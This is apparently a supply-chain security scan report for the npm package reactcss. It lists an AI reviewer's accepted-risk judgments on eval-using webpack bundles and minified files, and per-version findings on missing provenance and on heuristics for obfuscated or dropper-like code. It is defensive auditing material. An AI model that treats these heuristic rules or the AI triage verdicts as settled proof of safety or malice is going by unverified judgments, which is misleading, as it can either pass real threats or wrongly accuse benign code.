reactcss
Bringing Classes to Inline Styles
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Keywords
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:modules/react-material-design/lib/components/Tabs.js | AI (source-diff): File is a compiled/minified CoffeeScript build artifact — standard for this package's toolchain (gulp-uglify, coffee-script). Code is benign React component logic with no malicious patterns. | ai | |
| publish-pattern | new-deps-added | AI (publish-pattern): Swap from monolithic lodash to lodash.isarray/lodash.isobject is a well-known legitimate refactoring pattern; both are official lodash org packages. | ai | |
| source-diff | source-size-tripled | AI (source-diff): Size increase is entirely due to addition of webpack-bundled docs assets (2MB common.js). No runtime payload injected. | ai | |
| source-diff | obfuscated-file:docs/build/documentation.js | AI (source-diff): webpack dev-mode bundle with eval() for source maps. Content is clearly React documentation components. False positive for this package. | ai | |
| source-diff | net-exec-file:docs/build/documentation.js | AI (source-diff): eval() usage is webpack's development module evaluation with sourceURL annotations. Docs-only browser asset, not malicious. | ai | |
| source-diff | obfuscated-file:docs/build/home.js | AI (source-diff): webpack dev-mode bundle for docs homepage. Same pattern as documentation.js — React components in eval strings with source maps. False positive. | ai | |
| source-diff | net-exec-file:docs/build/home.js | AI (source-diff): Same webpack eval pattern as documentation.js. Browser-only docs asset, not a dropper/loader. | ai | |
| source-diff | obfuscated-file:docs/build/common.js | AI (source-diff): This is a webpack-bundled documentation site asset. Long lines are from minified webpack bootstrap code, not malicious obfuscation. Stable false positive for this package. | ai | |
| source-diff | net-exec-file:docs/build/common.js | AI (source-diff): webpack's __webpack_require__ module loader triggers net+exec heuristic but is a standard browser bundler pattern, not malware. Docs-only asset. | ai | |
| source-diff | obfuscated-file:lib/transform.js | AI (source-diff): lib/transform.js is standard Babel-transpiled/minified output of ReactCSS component logic. The content is clearly legitimate compiled ES6 class code, not malicious obfuscation. | ai | |
| semgrep | semgrep:eval-usage | AI (semgrep): eval in lib/is.js is Babel-compiled output of a type-checking utility in a CSS-in-JS library. No evidence of malicious code execution patterns. | ai | |
| phantom-deps | phantom-dep:classnames | AI (phantom-deps): classnames is a legitimate runtime dependency; phantom-dep false positive for this package. | ai | |
| source-diff | net-exec-file:docs/build/bundle.js | AI (source-diff): File is a standard webpack 1.x documentation bundle (webpackBootstrap pattern). Network calls and dynamic requires are inherent to webpack bundles serving a docs site, not malware indicators. | ai |
Versions (showing 26 of 26)
| Version | Deps | Published |
|---|---|---|
| 1.2.3 | 1 / 29 | |
| 1.2.2 | 1 / 29 | |
| 1.2.1 | 1 / 29 | |
| 1.2.0 | 1 / 29 | |
| 1.1.1 | 4 / 50 | |
| 1.1.0 | 4 / 50 | |
| 1.0.9 | 4 / 50 | |
| 1.0.8 | 4 / 49 | |
| 1.0.7 | 4 / 49 | |
| 1.0.6 | 4 / 49 | |
| 1.0.5 | 3 / 49 | |
| 1.0.4 | 3 / 49 | |
| 1.0.3 | 4 / 48 | |
| 1.0.2 | 4 / 48 | |
| 1.0.1 | 4 / 48 | |
| 0.4.6 | 4 / 47 | |
| 0.4.5 | 4 / 33 | |
| 0.4.4 | 4 / 33 | |
| 0.4.3 | 4 / 33 | |
| 0.4.2 | 3 / 30 | |
| 0.4.1 | 3 / 28 | |
| 0.4.0 | 3 / 28 | |
| 0.3.2 | 2 / 27 | |
| 0.3.1 | 2 / 27 | |
| 0.3.0 | 2 / 27 | |
| 0.2.0 | 2 / 23 |
v1.2.3
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.2.2
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.2.1
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.2.0
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.1.1
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.1.0
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.9
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.8
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.7
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.6
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.5
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.4
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.3
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.2
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.1
2 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.6
2 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.5
2 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.4
2 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.3
2 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.2
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.1
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.0
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.3.2
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.3.1
7 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.3.0
7 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.2.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.